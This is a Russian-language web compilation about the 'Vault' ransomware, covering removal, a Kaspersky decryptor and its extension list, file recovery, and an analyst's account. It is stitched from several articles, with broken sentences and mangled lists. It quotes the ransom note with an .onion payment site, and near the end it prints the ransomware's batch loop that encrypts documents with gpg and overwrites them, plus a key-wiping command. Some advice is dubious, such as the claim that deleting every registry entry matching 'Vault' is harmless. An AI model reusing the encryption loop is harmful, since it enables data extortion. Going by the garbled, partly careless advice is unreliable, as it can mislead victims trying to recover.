Вредоносное ПО (malware) - это назойливые или опасные программы,...
Сегодня мы поговорим с вами на тему: "Подхватили "Vault"-вирус: что делать?". Данная тема очень важна, особенно в современном мире, где разнообразная компьютерная зараза буквально на каждом шагу. Что это такое? Где можно встретить данную гадость? Как она действует? Обо всем этом сейчас и пойдет речь.
"С кем имею честь?"
Первым делом стоит начать с того, что мы с вами узнаем, что же это за дрянь такая: "Vault"-вирус. Что делать с ним и как бороться, поговорим чуть позже.
Как уже было сказано, нам придется иметь дело с так называемым шифровальщиком данных. Он проникает в операционную систему и начинает менять (зашифровывать) расширения всех ваших данных. Хорошо, если это только личная информация. А если компьютерная зараза добралась до системных файлов, то дела совсем плохи.
Если вы поймали вирус "Vault", что делать - не знаете, то первым делом потребуется понять, откуда этот "зверь" взялся на компьютере. Дело все в том, что выглядит данная вещица по-разному. У кого-то это программа для архивирования данных, а у кого-то он кажется специальным расширением для браузера. Итог один - у вас "угоняют" выход во да еще и ваши файлы потихоньку шифруются. Вот такой хитрый "Vault"-вирус. Что делать с ним? Сейчас мы с этим разберемся.
Проверка
Что ж, первый этап борьбы с абсолютно любой заразой на компьютере - это ничто иное, как проверка вашей системы на наличие вредоносных файлов и шпионов. Для этого потребуется Если вы думаете над вопросом: "Vault"-вирус: как лечить?", то лучше всего использовать Dr.Web или Nod32. Если они вам не по вкусу, то можно вполне воспользоваться и "Авастом".
Обновите базу данных с вирусами, а затем запустите глубокую проверку. Этот процесс может занять у вас довольно много времени. Тем не менее придется подождать. После завершения взгляните на результаты. Среди них обязательно будет проявляться вирус-шифровальщик "Vault". Что делать с полученными данными? Достаточно просто попытаться вылечить все вредоносное программное обеспечение. Что не поддается лечению - удалите. Это делается при помощи специальной кнопки в антивирусе. Теперь, когда вы просканировали компьютер, можно приступить к следующему этапу.
Избавление от программ
Итак, настало время для того, чтобы начать наводить порядок на компьютере. Если вы думаете над вопросом: "Vault"-вирус: как лечить?", то постарайтесь избавить операционную систему от разнообразного странного контента и программ, которые вы давно уже не используете, как можно скорее.
Дело все в том, что и угонщики браузеров, и шифровальщики очень любят прописывать в компьютер разного рода бесполезный контент, которые помогает зашифровывать данные. Избавление от таких программ упростит задачу лечения операционной системы.
Для того, чтобы ответить на вопрос: раз и навсегда?", перейдите в а оттуда пройдите в "Установку и Подождите, пока сформируется список установленного контента, а потом удалите все программы, которые вам незнакомы. Заодно очистите систему от тех приложений, что уже долгое время "пылятся" в сторонке. Готово? Тогда можете закрывать появившееся окошко и приступать к следующим мерам, которые обязательно помогут вам справиться с поставленной задачей.
Реестр
Когда пользователи сталкиваются с вопросом: "Vault"-вирус: что делать при инфицировании?", многие забывают о такой важной вещи, как реестр компьютера. Именно в него "прописывается" компьютерная зараза, от которой потом бывает довольно трудно избавиться.
Значит, давайте думать, каким именно можно очистить реестр. Для этого придется выполнить специальную команду (она помогает попасть в необходимую нам службу). Нажмите Win + R, а затем выполните команду "regedit". После того как вы нажмете на "Ввод", у вас откроется реестр компьютера. Можно продолжать думать над темой: ""Vault"-вирус: как удалить?".
Что ж, после того как мы попадем в нужную нам службу, придется подумать, куда требуется "залезть", дабы справиться с поставленной задачей. Слева вы увидите много папок с длинными названиями. Мастерски обходим их и направляемся в "правку". Там находим "поиск" и набираем в строчке "Vault". Запустите сканирование и дождитесь, пока вам будут показаны результаты проверки.
Все, что только обнаружит ваш компьютер, придется удалить. Не стоит бояться - после этого у вас не "слетит" операционная система, а файлы не будут повреждены. Так что просто кликайте по строчкам правой кнопкой мышки, а затем выбирайте команду "удалить". Готово? Тогда двигаемся дальше. Остается всего лишь несколько простых шагов, которые помогут решить проблему с нашим сегодняшним шифровальщиком.
Помощь программ
Наверное, при борьбе с любой вредоносной программой нельзя обойтись без так называемых сторонних программ, которые помогают найти и "обезвредить" вирусы. Например, прекрасным выбором будет Cclener. Это приложение, которое очищает реестр компьютера (наиболее эффективна после ручной очистки данной службы) и помогает освободить местечко на системном диске C.
Вам достаточно просто скачать Ccleaner и установить его. После запуска в левой части окна просто выставите желаемые настройки сканирования (какие разделы "обыскивать"), а затем нажмите на кнопочку "Сканировать". Всего несколько секунд - и результаты уже в ваших руках. Остается кликнуть по "Очистить" и посмотреть на итог.
Кроме того, если вы думаете над темой: "Vault"-вирус: что делать?", можете воспользоваться еще и так называемым SpyHunter. Это контент, помогающий обнаружить вредоносное ПО и шпионские программы, а также удаляющий подобного рода заразу. После установки и сканирования можно будет перезагрузить компьютер. В конечном итоге вирус больше не будет беспокоить вас.
Что делать с файлами?
Но теперь у вас должен появиться вопрос: "Что же делать с зашифрованными личными данными?". На самом деле, можно выбрать один из нескольких доступных способов.
Первый подходит особо осторожным пользователям. Такие, как правило, все свои файлы записывают на сторонние носители. Им можно предложить совершить удаление поврежденного контента, после чего произвести замену на "нормальные" данные.
Второй вариант - это использование специальных служб от антивирусных программ. Им отсылаются зашифрованные данные, после чего вам в ответ придет расшифровка. Довольно большим успехом пользуется Dr.Web в этом непросто деле. Вот и все. Теперь вы знаете, что делать, если вы подхватили вирус "Vault".
Утилита Kaspresky RakhniDecryptor расшифрует файлы, расширения которых изменились по следующим шаблонам:
- Trojan-Ransom.Win32.Rakhni:
- <имя_файла>.<оригинальное_расширение>.locked;
- <имя_файла>.<оригинальное_расширение>.kraken;
- <имя_файла>.<оригинальное_расширение>.darkness;
- <имя_файла>.<оригинальное_расширение>.oshit;
- <имя_файла>.<оригинальное_расширение>.nochance;
- <имя_файла>.<оригинальное_расширение>.oplata@qq_com;
- <имя_файла>.<оригинальное_расширение>.relock@qq_com;
- <имя_файла>.<оригинальное_расширение>.crypto;
- <имя_файла>.<оригинальное_расширение>[email protected];
- <имя_файла>.<оригинальное_расширение>.p***a@qq_com;
- <имя_файла>.<оригинальное_расширение>.dyatel@qq_com;
- <имя_файла>.<оригинальное_расширение>.nalog@qq_com;
- <имя_файла>.<оригинальное_расширение>.chifrator@gmail_com;
- <имя_файла>.<оригинальное_расширение>.gruzin@qq_com;
- <имя_файла>.<оригинальное_расширение>.troyancoder@gmail_com;
- <имя_файла>.<оригинальное_расширение>.coderksu@gmail_com_id373;
- <имя_файла>.<оригинальное_расширение>.coderksu@gmail_com_id371;
- <имя_файла>.<оригинальное_расширение>.coderksu@gmail_com_id372;
- <имя_файла>.<оригинальное_расширение>.coderksu@gmail_com_id374;
- <имя_файла>.<оригинальное_расширение>.coderksu@gmail_com_id375;
- <имя_файла>.<оригинальное_расширение>.coderksu@gmail_com_id376;
- <имя_файла>.<оригинальное_расширение>.coderksu@gmail_com_id392;
- <имя_файла>.<оригинальное_расширение>.coderksu@gmail_com_id357;
- <имя_файла>.<оригинальное_расширение>.coderksu@gmail_com_id356;
- <имя_файла>.<оригинальное_расширение>.coderksu@gmail_com_id358;
- <имя_файла>.<оригинальное_расширение>.coderksu@gmail_com_id359;
- <имя_файла>.<оригинальное_расширение>.coderksu@gmail_com_id360;
- <имя_файла>.<оригинальное_расширение>.coderksu@gmail_com_id20.
Trojan-Ransom.Win32.Rakhni создает файл exit.hhr.oshit, в котором в зашифрованном виде содержится пароль от файлов пользователя. Если на зараженном компьютере сохранился этот файл, расшифровка произойдет значительно быстрее. Если же файл exit.hhr.oshit был удален, восстановите его при помощи программ восстановления удаленных файлов, а затем поместите в папку %APPDATA% и заново запустите проверку утилитой. Файл exit.hhr.oshit вы можете найти по следующему пути: C:\Users<имя_пользователя>\AppData\Roaming
- Trojan-Ransom.Win32.Mor: <имя_файла>.<оригинальное_расширение>_crypt.
- Trojan-Ransom.Win32.Autoit: <имя_файла>.<оригинальное_расширение>.<[email protected]_.буквы>.
- Trojan-Ransom.MSIL.Lortok:
- <имя_файла>.<оригинальное_расширение>.cry;
- <имя_файла>.<оригинальное_расширение>.AES256.
- Trojan-Ransom.AndroidOS.Pletor: <имя_файла>.<оригинальное_расширение>.enc.
- Trojan-Ransom.Win32.Agent.iih: <имя_файла>.<оригинальное_расширение>+
. - Trojan-Ransom.Win32.CryFile: <имя_файла>.<оригинальное_расширение>.encrypted.
- Trojan-Ransom.Win32.Democry:
- <имя_файла>.<оригинальное_расширение>+<._дата-время_$почта@домен$.777>;
- <имя_файла>.<оригинальное_расширение>+<._дата-время_$почта@домен$.legion>.
- Trojan-Ransom.Win32.Bitman версии 3:
- <имя_файла>.xxx;
- <имя_файла>.ttt;
- <имя_файла>.micro;
- <имя_файла>.mp3.
- Trojan-Ransom.Win32.Bitman версии 4: <имя_файла>.<оригинальное_расширение> (имя и расширение файла не меняется).
- Trojan-Ransom.Win32.Libra:
- <имя_файла>.encrypted;
- <имя_файла>.locked;
- <имя_файла>.SecureCrypted.
- Trojan-Ransom.MSIL.Lobzik:
- <имя_файла>.fun;
- <имя_файла>.gws;
- <имя_файла>.btc;
- <имя_файла>.AFD;
- <имя_файла>.porno;
- <имя_файла>.pornoransom;
- <имя_файла>.epic;
- <имя_файла>.encrypted;
- <имя_файла>.J;
- <имя_файла>.payransom;
- <имя_файла>.paybtcs;
- <имя_файла>.paymds;
- <имя_файла>.paymrss;
- <имя_файла>.paymrts;
- <имя_файла>.paymst;
- <имя_файла>.paymts;
- <имя_файла>.gefickt;
- <имя_файла>[email protected].
- Trojan-Ransom.Win32.Mircop:
.<имя_файла>.<оригинальное_расширение>. - Trojan-Ransom.Win32.Crusis (Dharma):
- <имя_файла>.ID<…>.
@ . .xtbl; - <имя_файла>.ID<…>.
@ . .CrySiS; - <имя_файла>.id-<…>.
@ . .xtbl; - <имя_файла>.id-<…>.
@ . .wallet; - <имя_файла>.id-<…>.
@ . .dhrama; - <имя_файла>.id-<…>.
@ . .onion; - <имя_файла>.
@ . .wallet; - <имя_файла>.
@ . .dhrama; - <имя_файла>.
@ . .onion.
- <имя_файла>.ID<…>.
- [email protected];
- [email protected];
- [email protected];
- [email protected];
- [email protected];
- [email protected];
- [email protected];
- [email protected];
- [email protected];
- [email protected];
- [email protected].
- Trojan-Ransom.Win32.Nemchig: <имя_файла>.<оригинальное_расширение>[email protected].
- Trojan-Ransom.Win32.Lamer:
- <имя_файла>.<оригинальное_расширение>.bloked;
- <имя_файла>.<оригинальное_расширение>.cripaaaa;
- <имя_файла>.<оригинальное_расширение>.smit;
- <имя_файла>.<оригинальное_расширение>.fajlovnet;
- <имя_файла>.<оригинальное_расширение>.filesfucked;
- <имя_файла>.<оригинальное_расширение>.criptx;
- <имя_файла>.<оригинальное_расширение>.gopaymeb;
- <имя_файла>.<оригинальное_расширение>.cripted;
- <имя_файла>.<оригинальное_расширение>.bnmntftfmn;
- <имя_файла>.<оригинальное_расширение>.criptiks;
- <имя_файла>.<оригинальное_расширение>.cripttt;
- <имя_файла>.<оригинальное_расширение>.hithere;
- <имя_файла>.<оригинальное_расширение>.aga.
- Trojan-Ransom.Win32.Cryptokluchen:
- <имя_файла>.<оригинальное_расширение>.AMBA;
- <имя_файла>.<оригинальное_расширение>.PLAGUE17;
- <имя_файла>.<оригинальное_расширение>.ktldll.
- Trojan-Ransom.Win32.Rotor:
- <имя_файла>.<оригинальное_расширение>[email protected];
- <имя_файла>.<оригинальное_расширение>[email protected];
- <имя_файла>.<оригинальное_расширение>[email protected];
- <имя_файла>.<оригинальное_расширение>[email protected];
- <имя_файла>.<оригинальное_расширение>[email protected]_.crypt;
- <имя_файла>.<оригинальное_расширение>[email protected]____.crypt;
- <имя_файла>.<оригинальное_расширение>[email protected]_______.crypt;
- <имя_файла>.<оригинальное_расширение>[email protected]___.crypt;
- <имя_файла>.<оригинальное_расширение>[email protected]==.crypt;
- <имя_файла>.<оригинальное_расширение>[email protected]=--.crypt.
Примеры некоторых вредоносных адресов-распространителей:
Если файл зашифрован с расширением CRYPT, расшифровка может длиться долго. Например, на процессоре Intel Core i5-2400 она может занять около 120 суток.
- Trojan-Ransom.Win32.Chimera:
- <имя_файла>.<оригинальное_расширение>.crypt;
- <имя_файла>.<оригинальное_расширение>.<4 произвольных символа>.
- Trojan-Ransom.Win32.AecHu:
- <имя_файла>.aes256;
- <имя_файла>.aes_ni;
- <имя_файла>.aes_ni_gov;
- <имя_файла>.aes_ni_0day;
- <имя_файла>.lock;
- <имя_файла>.decrypr_helper@freemail_hu;
- <имя_файла>[email protected];
- <имя_файла>.~xdata.
- Trojan-Ransom.Win32.Jaff:
- <имя_файла>.jaff;
- <имя_файла>.wlu;
- <имя_файла>.sVn.
Trojan-Ransom.Win32.Cryakl: email-<...>.ver-<...>.id-<...>.randomname-<...>.<случайное_расширение>.
Версия вредоносной программы Адрес электронной почты злоумышленников [email protected]_graf1
[email protected]_mod2
Как расшифровать файлы утилитой Kaspersky RakhniDecryptor
- Скачайте архив RakhniDecryptor.zip и распакуйте его. Инструкция в статье .
- Перейдите в папку с файлами из архива.
- Запустите файл RakhniDecryptor.exe.
- Нажмите Изменить параметры проверки .
- Выберите объекты для проверки: жесткие диски, сменные диски или сетевые диски.
- Установите флажок Удалять зашифрованные файлы после успешной расшифровки . В этом случае утилита будет удалять копии зашифрованных файлов с присвоенными расширениями LOCKED, KRAKEN, DARKNESS и т.д.
- Нажмите ОК .
- Нажмите Начать проверку .
- Выберите зашифрованный файл и нажмите Открыть .
- Прочитайте предупреждение и нажмите ОК .
Файлы будут расшифрованы.
Файл может быть зашифрован с расширением CRYPT более одного раза. Например, если файл тест.doc зашифрован два раза, первый слой утилита RakhniDecryptor расшифрует в файл тест.1.doc.layerDecryptedKLR. В отчете о работе утилиты появится запись: «Decryption success: диск:\путь\тест.doc_crypt -> диск:\путь\тест.1.doc.layerDecryptedKLR». Этот файл необходимо еще раз расшифровать утилитой. При успешной расшифровке файл будет пересохранен с оригинальным названием тест.doc.
Параметры для запуска утилиты из командной строки
Для удобства и ускорения процесса расшифровки файлов Kaspersky RakhniDecryptor поддерживает следующие параметры командной строки:
| Имя команды | Значение | Пример |
|---|---|---|
| –threads | Запуск утилиты с подбором пароля в несколько потоков. Если параметр не задан, количество потоков равно количеству процессорных ядер. | RakhniDecryptor.exe –threads 6 |
| –start <число> –end <число> |
Возобновление подбора пароля с определенного состояния. Минимальное число 0. Остановка подбора пароля на определенном состоянии. Максимальное число 1 000 000. Подбор пароля в диапазоне между двумя состояниями. |
RakhniDecryptor.exe –start 123 RakhniDecryptor.exe –end 123 RakhniDecryptor.exe –start 100 –end 50000 |
| -l <название файла с указанием полного пути к нему> | Указание пути к файлу, где должен сохраняться отчет о работе утилиты. | RakhniDecryptor.exe -l C:Users\Administrator\RakhniReport.txt |
| -h | Вывод справки о доступных параметрах командной строки | RakhniDecryptor.exe -h |
Недавно пользователи столкнулись с новой угрозой – вирусом, который шифрует файлы, заменяя стандартные расширения. В результате документы, аудио и видеозаписи, изображения становятся недоступными. За ключ для расшифровки злоумышленники требуют серьезные деньги.
Шифровальщики настолько опасны, что от них не могут спастись даже крупные организации: например, в феврале 2016 года Голливудскому пресвитерианскому медицинскому центру пришлось заплатить злоумышленникам 17000$ за ключ для дешифровки. Доподлинно неизвестно, какой шифровальщик поработал в Голливуде, но пользователи Рунета обычно встречаются с вирусом Vault. Поэтому давайте посмотрим, как восстановить файлы после вируса Vault, если это возможно.
Как восстановить файлы после вируса Vault
Обнаружение вируса
Заражение сложно не заметить: файлы автоматически начнут менять расширение на.vault и перестанут открываться, а на экране появится сообщение типа «Данные заблокированы. Для их восстановления необходимо получить уникальный ключ». Ниже обычно указан адрес сайта и инструкция по оплате и получению кода дешифровки.
Если вы увидели такое сообщение, то необходимо немедленно выключить компьютер и вытащить все съемные носители. Vault шифрует информацию постепенно, поэтому у вас есть время, чтобы спасти некоторые файлы.
Но как вирус попал на компьютер? Вероятнее всего, по электронной почте. Пользователям приходит письмо с важной темой (кредитная задолженность, повестка в суд, подтверждение оплаты и т.д.), они послание открывают, после чего на компьютер скачивается программа для шифрования и баннер Ваулт с инструкцией по оплате кода дешифровки.
Для шифровки используется бесплатная и безобидная программа GPG, применяющая алгоритм RSA-1024. Формально это не вирус, поэтому антивирусная защита не срабатывает. Но ключ, необходимый для расшифровки информации, остается у хакера, а взломать код не получится – на это уйдет несколько лет перебора значений. Поэтому не открывайте письма от неизвестных отправителей!
Удаление шифровальщика
Удалить Ваулт достаточно просто: он не глубоко проникает в систему и портит жизнь только тем, что закрывает доступ к информации. Для чистки системы используйте лечащую утилиту Dr.Web CureIt! или Kaspersky Virus Removal Tool. Запускать эти утилиты следует в безопасном режиме Windows.
Порядок простой:
Дополнительно следует удалить компоненты Ваулт, которые хранятся в скрытой папке по адресу C:\Users\Пользователь\AppData\Loca\Temp. Структура вредоносного кода выглядит следующим образом:
- 3c21b8d9.cmd.
- fabac41c.js.
- 04fba9ba_VAULT.KEY.
- VAULT.txt.
- Sdc0.bat.
- CONFIRMATION.KEY.
- VAULT.KEY.
Последние два компонента вам пригодятся, если вы решите заплатить злоумышленникам за расшифровку. В них хранится открытая часть ключа (у хакеров закрытая часть, без которой код не снять) и информация о количестве зашифрованных данных.
Есть и другой вариант – записать на флешку Kaspersky Rescue Disk и загрузить с неё компьютер. Вам понадобится работающий компьютер, флешка, утилита для записи и образ Kaspersky Rescue Disk 10.
Расшифровка файлов
С вредоносным ПО вы быстро справитесь, но дальше возникнет серьезная проблема – не существует дешифратора, который быстро откроет доступ к информации, зашифрованной по алгоритму RSA-1024. Позиция крупных разработчиков антивирусного ПО сводится к тому, что у них нет технической возможности взломать код. Поэтому вариантов остается немного:
- Если утеряна информация, которая не представляет большой ценности, то её проще удалить с компьютера. И запомнить, что не нужно открывать странные письма от неизвестных отправителей.
- Если зашифрованные данные представляют большую ценность, придется заплатить отправителям вирусного ПО. Это крайний вариант, потому что нет уверенности, что вас не обманут. К тому же вы стимулируете злоумышленников продолжать рассылать зараженные письма, ведь это приносит им деньги.
Из доступных способов расшифровки можно попробовать несколько вариантов, но нет гарантии, что они дадут положительный результат:
- Обратитесь на форум технической поддержки крупных разработчиков антивирусных программ. Лаборатория Касперского, Dr.Web, ESET. База данных шифровальщиков постоянно расширяется. Опишите подробно проблему, возможно, у них найдутся инструменты для её решения.
- Используйте теневые копии файлов (актуально, если была включена защита системы).
Откройте свойства зашифрованного файла и перейдите на вкладку «Предыдущие версии».
Если есть прежние, незашифрованные редакции, то вы можете их открыть или восстановить. В таком случае данные с расширением.vault нужно удалить с компьютера. К сожалению, других работающих способов нет. Поэтому лучше избегать встречи с шифровальщиком: не открывать странные письма, не скачивать подозрительные программы, не переходить по неизвестным ссылкам.
В последнее время всё больше пользователей сталкивается с новым вирусом-шифровальщиком, который заменяет стандартные расширения файлов на vault. Некоторые думают, что можно решить эту проблему, изменив расширение вручную, однако это ошибочное мнение – без уникального ключа (VAULT.KEY) восстановить доступ к файлам не получится.
Обнаружение и удаление шифровальщика
Главная опасность вируса Vault в том, что антивирусы его не обнаруживают. Попадает вредоносное ПО на компьютер обычно в виде вложения в письме. Пользователь сам открывает электронное послание, и вместе с приложенным файлом запускает процедуру шифрования.
Обнаружить и удалить вирус можно только при глубокой проверке с помощью мощных антивирусов типа Nod32 или Dr.Web. Дополнительно просканируйте систему лечащей утилитой Dr. Web CureIT или программой Kaspersky Virus Removal Tool (утилита бесплатна). Проследите, чтобы у антивирусного ПО была обновлена база, иначе вирус не будет обезврежен.
Восстановление файлов
После обезвреживания и удаления вируса остается восстановить файлы, расширение которых изменилось на vault. Не стоит пытаться искать готовый дешифратор – его не существует, нет даже технической возможности создать программу, которая сможет открыть доступ к зашифрованным файлам без уникального ключа (второй части файла VAULT.KEY). Но можно попробовать другие варианты:
- Использование теневой копии.
- Поиск файлов в архивных копиях.
- Проверка облачных хранилищ.
Использование теневой копии
Первое, что необходимо сделать, чтобы попытаться восстановить бесплатно файлы после действия вируса ваулт – проверить, не осталось ли теневых копий нужных данных. Если у вас была включена защита системы, то этот способ может сработать.
Поиск архивной копии
Если зашифрованные вирусом vault данные хранились на сетевом диске, поищите их архивные копии. Если на сетевом диске была предварительно создана корзина, можно заглянуть в неё – там тоже могут остаться целые файлы. Если под действие вируса-шифровальщика Vault попали папки, синхронизированные с облачными хранилищами (Яндекс.Диск, Google Drive, Dropbox), то посмотрите нужную информацию на этих сервисах.
Стоит ли платить злоумышленникам?
Если ни один из перечисленных методов не помог получить доступ к нужной информации, то остается последний способ – обращение к отправителям вируса шифровальщика. Если судить по отзывам, можно вернуть все файлы после шифрования. Но за индивидуальный key для расшифровки придется заплатить деньги, конкретную сумму злоумышленники указывают на своих сайтах или в инструкции, которая появляется после заражения системы вирусом vault.
Не пользуйтесь услугами компаний/частных лиц, которые предлагают восстановить файлы или купить у них дешифратор. Никакого дешифратора у них нет, а если они и предоставляют в качестве доказательства часть ваших файлов, то взяты эти данные у злоумышленников, отправивших вам вирус vault.
Без индивидуального значения key расшифровать файлы невозможно. Хранится ключ на сервере владельцев вируса, доступ к нему получить никакими средствами нельзя.
Если вы всё-таки решите обратиться за восстановлением информации к тем людям, что их зашифровали, то вам нужно предоставить им два файла:
- VAULT.KEY – первая часть ключа шифрования, которая создается на стороне пользователя. Вторая часть key находится у злоумышленников. Если вы случайно удалите VAULT.KEY, то восстановить файлы не удастся.
- CONFIRMATION.KEY – содержит в себе информацию о том, какой объем информации зашифрован. На основании этих сведений владельцы вируса рассчитывают, сколько денег с вас потребовать.
Мы не рекомендуем платить деньги отправителям вирусов. Нет гарантии, что они не обманут, к тому же это только стимулирует их на продолжение преступной деятельности. Оплата второй части ключа - это крайняя мера, на которую следует идти лишь в том случае, если утеряна информация чрезвычайной важности.
Альтернативный метод
Можно попытаться обратиться за расшифровкой на форумы известных лабораторий, занимающихся разработкой антивирусного ПО, но даже такие гиганты рынка, как Kaspersky, ESET и Dr. Web признают, что они не могут расшифровать данные после вируса за приемлемое время, не имея второй части VAULT.KEY.
Можно попробовать утилиты-дешифраторы от тех же компаний по разработке антивирусного ПО. На данный момент они не могут подобрать VAULT.KEY, но базы данных постоянно расширяются, так что есть вероятность, что в скором времени проблема будет решена.
- Скорее всего вы встретились с такой проблемой как шифрование ваших файлов и соответственно без вашего ведома, желания. Открыв ссылку в письме, которое пришло к вам по почте и скорее всего от проверенного отправителя с которым вы уже вели переписку. Но может и как реклама! Но факт на лицо и у вас появились ниже приведенные симптомы, которые проявились следующим образом:
- Ваши рабочие документы и базы данных были заблокированы и помечены форматом.vаult
- Для их восстановления необходимо получить уникальный ключ
- ПРОЦЕДУРА ПОЛУЧЕНИЯ КЛЮЧА:
- КРАТКО
- 1. Зайдите на наш веб-ресурс
- 2. Гарантированно получите Ваш ключ
- 3. Восстановите файлы в прежний вид
- ДЕТАЛЬНО
- Шаг 1:
- Скачайте Tor браузер с официального сайта: https://www.torproject.org
- Шаг 2:
- Используя Tor браузер посетите сайт: https://restoredz4xpmuqr.onion
- Шаг 3:
- Найдите Ваш уникальный VAULT.KEY на компьютере — это Ваш ключ к личной клиент-панели. Не удалите его
- Авторизуйтесь на сайте используя ключ VAULT.KEY
- Перейдите в раздел FAQ и ознакомьтесь с дальнейшей процедурой
- STEP 4:
- После получения ключа, Вы можете восстановить файлы используя наше ПО с открытым исходным кодом или же безопасно использовать своё ПО
- ДОПОЛНИТЕЛЬНО
- a) Вы не сможете восстановить файлы без уникального ключа (который безопасно хранится на нашем сервере)
- b) Если Вы не можете найти Ваш VAULT.KEY, поищите во временной папке TEMP
- c) Ваша стоимость восстановления не окончательная, пишите в чат
- Дата блокировки: 08.04.2015 (11:14)
- На ваше усмотрение. Вы можете сделать как написано в файле(но я бы не стал). Почему? Потому что это не надежно, платить вымогальшикам это поддерживать и развивать их силу. Да и потом, врятли вы получите, ключ расшифровки.
- Появление такого сообщения уже означает, что vault вирус заразил ваш компьютер и начал шифрование файлов. В этот момент необходимо сразу же выключить компьютер, отключить его от сети и вынуть все сменные носители. Как провести лечение от вируса мы поговорим позже, а пока я расскажу, что же произошло у вас в системе.
- Скорее всего вам пришло письмо по почте от доверенного контрагента или замаскированное под известную организацию. Это может быть просьба провести бухгалтерскую сверку за какой-то период, просьба подтвердить оплату счета по договору, предложение ознакомиться с кредитной задолженностью в сбербанке или что-то другое. Но информация будет такова, что непременно вас заинтересует и вы откроете почтовое вложение с вирусом. На это и расчет.
- Итак, вы открываете вложение, которое имеет расширение.js и является ява скриптом. По идее, это уже должно вас насторожить и остановить от открытия, но если вы читаете эти строки, значит не насторожило и не остановило. Скрипт скачивает с сервера злоумышленников троян или банер ваулт, как его в данном случае можно назвать, и программу для шифрования. Складывает все это во временную директорию пользователя. И сразу начинается процесс шифрования файлов во всех местах, куда у пользователя есть доступ - сетевые диски, флешки, внешние харды и т.д.
- В качестве шифровальщика vault выступает бесплатная утилита для шифрования gpg и популярный алгоритм шифрования - RSA-1024. Так как по своей сути эта утилита много где используется, не является вирусом сама по себе, антивирусы пропускают и не блокируют ее работу. Формируется открытый и закрытый ключ для шифрования файлов. Закрытый ключ остается на сервере хакеров, открытый на компьютере пользователя.
- Проходит некоторое время после начала процесса шифрования. Оно зависит от нескольких факторов - скорости доступа к файлам, производительности компьютера. Дальше появляется информационное сообщение в текстовом файле, содержание которого я привел в самом начале. В этот момент часть информации уже зашифрована.
- Конкретно мне попалась модификация вируса vault, которая работала только на 32 битных системах. Причем на Windows 7 с включенным UAC выскакивает запрос на ввод пароля администратора. Без ввода пароля вирус ничего сделать не сможет. На Windows XP он начинает работу сразу после открытия файла из почты, никаких вопросов не задает.
- Что же конкретно делает с файлами вирус? На первый взгляд кажется, что он просто меняет расширение со стандартного на.vault. Когда я первый раз увидел работу этого virus-шифровальщика, я так и подумал, что это детская разводка. Переименовал обратно файл и очень удивился, когда он не открылся как полагается, а вместо положенного содержания открылась каша из непонятных символов. Тут я понял, то все не так просто, начал разбираться и искать информацию.
- Вирус прошелся по всем популярным типам файлов - doc, docx, xls, xlsx, jpeg, pdf и другим. К стандартному имени файла прибавилось новое расширение.vault. Некоторым он шифрует и файлы с локальными базами 1С. У меня таких не было, так что сам лично я это не наблюдал. Простое переименовывание файла обратно, как вы понимаете, тут не помогает.
- Так как процесс шифрования не мгновенный, может так получиться, что когда вы узнаете о том, что у вас шурует вирус на компьютере, часть файлов еще будет нормальная, а часть зараженная. Хорошо, если не тронутой останется большая часть. Но чаще всего на это рассчитывать не приходится.
- Расскажу, что скрывается за сменой расширения. После шифрования, к примеру, файла file.doc рядом с ним вирус vault создает зашифрованный файл file.doc.gpg, затем зашифрованный file.doc.gpg перемещается на место исходного с новым именем file.doc, и только после этого переименовывается в file.doc.vault. Получается, что исходный файл не удаляется, а перезаписывается зашифрованным документом. После этого его невозможно восстановить стандартными средствами по восстановлению удаленных файлов. Вот часть кода, которая реализует подобный функционал:
- После обнаружения вируса шифровальщика первым делом необходимо от него избавиться, проведя лечение компьютера. Лучше всего загрузиться с какого-нибудь загрузочного диска и вручную очистить систему. Virus vault в плане въедливости в систему не сложный, вычистить его легко самому. Я подробно не буду останавливаться на этом моменте, так как тут подойдут стандартные рекомендации по удалению вирусов шифровальщиков, банеров и троянов.
- Само тело вируса находится во временной папке temp пользователя, который его запустил. Вирус состоит из следующих файлов. Названия могут меняться, но структура будет примерно такой же:
Внезапно открывается текстовый файл в блокноте, следующего содержания:
Вирус ставит расширение vault на doc, jpg, xls и других файлах
dir /B "%1:"&& for /r "%1:" %%i in (*.xls *.doc) do (echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst" echo %%i>> "%temp%\conf.list")
Как удалить вирус vault и вылечить компьютер
- 3c21b8d9.cmd
- 04fba9ba_VAULT.KEY
- CONFIRMATION.KEY
- fabac41c.js
- Sdc0.bat
- VAULT.KEY
- VAULT.txt
Как восстановить и расшифровать файлы после вируса vault
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\secring.gpg"
